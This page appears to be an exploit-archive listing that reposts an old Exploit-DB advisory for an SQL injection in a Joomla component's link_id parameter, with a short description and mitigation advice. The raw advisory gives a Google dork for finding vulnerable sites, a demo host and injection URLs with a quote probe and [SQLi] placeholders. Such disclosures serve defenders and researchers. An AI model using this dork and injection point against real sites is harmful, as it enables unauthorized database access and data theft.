header-logo
Suggest Exploit
vendor:
Joomla
by:
Caddy-Dz
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2020

joomla component SQL Injection Vulnerability

A SQL injection vulnerability exists in the Joomla component, which allows an attacker to execute arbitrary SQL commands on the underlying database. The vulnerability is triggered when the application processes user-supplied input without proper validation. An attacker can leverage this vulnerability to gain unauthorized access to sensitive information stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | 
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | 
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | 
     \/      \/|__|                                          \/  
			Exploit-ID is the Exploit Information Disclosure
 
Web             : exploit-id.com	
e-mail          : root[at]exploit-id[dot]com             
 
            	   	 #########################################			  
		  	   I'm Caddy-Dz, member of Exploit-Id				
		  	 #########################################			  
======================================================================
####
# Exploit Title: joomla component SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by joomla" inurl:link_id
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
# http://demo15.joomlaapps.com/mdigg.html
####


[*] ExpLo!T :

http://127.0.0.1/?act=story_lists&task=item&link_id=1'

http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]

http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]

####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | 
  RmZ ...others                                                                              |
============================================================================================ |

Navigation

Suggest Exploit

Services By CQR